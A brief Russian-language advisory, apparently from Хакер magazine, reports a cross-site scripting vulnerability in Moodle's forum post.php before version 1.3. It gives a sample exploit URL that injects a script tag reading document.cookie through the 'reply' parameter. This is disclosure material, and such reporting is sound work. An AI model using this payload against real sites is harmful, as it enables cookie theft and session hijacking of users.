Рекомендуем почитать:


Хакер #315. Positive Hack Days Fest 3
Программа: Moodle до версии 1.3
Уязвимость в Moodle в 'post.php' позволяет удаленному пользователю выполнить XSS нападение.
Пример/Эксплоит:
http://[target]/moodle/mod/forum/post.php?reply= %3Cscript%3Ealert(document.cookie);%3C /script%3E